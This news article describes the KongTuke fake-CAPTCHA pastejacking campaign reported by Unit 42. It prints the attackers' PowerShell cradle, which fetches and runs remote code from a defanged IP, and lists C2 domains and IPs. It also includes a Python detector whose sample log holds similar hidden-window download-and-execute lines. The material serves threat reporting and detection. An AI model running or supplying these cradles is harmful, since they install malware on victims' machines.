“Clipboard Hijacking”: A Fake CAPTCHA Leverages a Pastejacking Script via Hacked Sites to Steal Clipboard Data


Apr 5, 2025 - 14:51
A sophisticated new cyberattack chain dubbed “KongTuke” has been uncovered by cybersecurity researchers, targeting unsuspecting internet users through compromised legitimate websites.

Detailed in a report by Bradley Duncan of Palo Alto Networks’ Unit 42 team, this attack leverages malicious scripts and fake CAPTCHA pages to hijack victims’ clipboards and potentially install unidentified malware.

The findings were shared on April 4, 2025, with additional insights posted on X by Unit 42 Intel, highlighting the growing threat of this campaign.

The Attack Chain

The KongTuke attack begins with a malicious script injected into legitimate but vulnerable websites. One such example cited in the report is hxxps://lancasternh[.]com/6t7y.js, which redirects users to a secondary script at hxxps://lancasternh[.]com/js.php.

(Image: script injected into pages of compromised websites)

This script collects detailed information about the victim’s device, including IP address, browser type, and referrer data, and sends it base64-encoded.

From there, users are led to a deceptive “verify you are human” page mimicking a CAPTCHA, a common security feature meant to distinguish humans from bots.

(Image: the fake CAPTCHA page)

However, this CAPTCHA is a ruse. Instead of verifying identity, the page employs a technique known as “clipboard hijacking” or “pastejacking.” It covertly injects a malicious PowerShell script into the victim’s clipboard, accompanied by instructions urging the user to paste and execute it via a Windows Run window.

The script in question, as detailed by Duncan, is:

powershell -w h -c "iex $(irm 138.199.156[.]22:8080/$($z = [datetime]::UtcNow; $y = ([datetime]('01/01/' + '1970')); $x = ($z - $y).TotalSeconds; $w = [math]::Floor($x); $v = $w - ($w % 16); [int64]$v))"

This command connects to a remote server at 138.199.156[.]22:8080 and retrieves additional malicious content based on a timestamp calculation: the URL path is the current UTC time in Unix epoch seconds, rounded down to a multiple of 16, so the downloaded content is piped straight into Invoke-Expression without ever touching disk.
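As an added example (not code from the article or the Unit 42 report), the following Python detector flags process-creation command lines that have the shape of this lure: a hidden PowerShell window, in-memory execution of fetched content, and a raw IP:port destination. The sample log lines are constructed for illustration.

```python
import re
from typing import Dict, List

# Indicator patterns over a process command line, case-insensitive. The short
# aliases (-w h, iex, irm) are listed alongside the long forms because the
# pasted lure relies on them to keep the Run-window text short.
INDICATORS: Dict[str, re.Pattern] = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "web_download": re.compile(
        r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b", re.I),
    # A bare IP:port URL with a path, as the cradle uses instead of a hostname.
    "raw_ip_url": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}(?::\d{1,5})?/\S", re.I),
}

def score_command_line(cmd: str) -> List[str]:
    """Return the indicator names present in one PowerShell command line."""
    if not re.search(r"\bpowershell(?:\.exe)?\b", cmd, re.I):
        return []
    return [name for name, pat in INDICATORS.items() if pat.search(cmd)]

def is_pastejack_cradle(cmd: str) -> bool:
    """Flag download-and-execute cradles: fetched content executed in memory,
    plus either a hidden window or a raw IP destination."""
    hits = set(score_command_line(cmd))
    return {"invoke_expression", "web_download"} <= hits and bool(
        hits & {"hidden_window", "raw_ip_url"})

def scan_log(lines: List[str]) -> List[str]:
    """Return the command lines from a log that look like cradles."""
    return [line for line in lines if is_pastejack_cradle(line)]

# Constructed sample of process-creation command lines (Sysmon Event ID 1 /
# Security 4688 style). They are illustrative, not captures from the report;
# the path 1743811200 is an arbitrary epoch value divisible by 16.
SAMPLE_LOG = [
    'powershell -w h -c "iex $(irm 138.199.156.22:8080/1743811200)"',
    "powershell -NoProfile -Command Get-ChildItem C:\\Users",
    'powershell.exe -WindowStyle Hidden -Command "Invoke-Expression '
    '(Invoke-RestMethod http://example.test/payload)"',
    "C:\\Windows\\explorer.exe",
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("SUSPICIOUS:", hit, score_command_line(hit))
```

The same patterns apply to the RunMRU registry values that the Windows Run dialog keeps, which is where a pasted lure leaves its trace on the host.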

Traffic and Post-Infection Activity

According to the Unit 42 report, once executed, the script initiates a series of network requests. Initial traffic includes GET and POST requests to the same IP address, followed by connections to domains such as ecduutcykpvkbim[.]top and bfidmcjejlilflg[.]top.

These domains, hosted at 185.250.151[.]155:80, appear to serve as staging points for further infection. Post-infection, the compromised system establishes command-and-control (C2) communication with 8qvihxy8x5nyixj[.]top over TLSv1.0 HTTPS traffic via 173.232.146[.]62:25658.

Interestingly, the infected host also performs an IP address check using services like api.ipify[.]org and ipinfo[.]io, gathering geolocation data such as city, region, and country. While this step is not inherently malicious, it suggests the attackers are profiling their victims for targeted exploitation.

A Familiar Yet Elusive Threat

The KongTuke campaign has been tracked by cybersecurity communities, including @monitorsg on Mastodon and ThreatFox, under the hashtag #KongTuke.

Duncan notes that the post-infection traffic bears similarities to patterns observed with AsyncRAT, a well-known remote access trojan.

However, the final malware payload remains unidentified, as researchers have yet to obtain a sample for analysis. This uncertainty underscores the evolving nature of the threat and the challenges in combating it.

Unit 42 Intel took to X on April 4, 2025, to alert the public, stating: “Injected #KongTuke script in pages from legitimate but compromised websites leads to fake #CAPTCHA style pages and #ClipboardHijacking (#pastejacking). These pages ask users to paste malicious script into a Run window.” The post, accessible at https://x.com/Unit42_Intel/status/1908253830166323637, included a link to further details and a visual of the fake CAPTCHA page, emphasizing the urgency of awareness.

Bradley Duncan, the author of the report, highlighted the insidious nature of this attack in his notes: “This process is sometimes called ‘clipboard hijacking’ or ‘pastejacking,’ tricking users into executing harmful code under the guise of a routine verification.”

The use of compromised legitimate websites adds a layer of trust that makes the attack particularly dangerous.

Cybersecurity experts urge users to exercise caution when encountering CAPTCHA prompts, especially those requesting manual script execution.

Legitimate CAPTCHAs typically involve simple tasks like image selection, not copying and pasting code.

Users should also keep their systems updated, avoid clicking suspicious links, and employ robust antivirus software to detect and block such threats.

As the KongTuke campaign continues to evolve, researchers at Unit 42 and beyond are working to identify the final malware and disrupt the attack infrastructure. For now, vigilance remains the best defense against this cunning exploitation of trust in everyday web interactions.
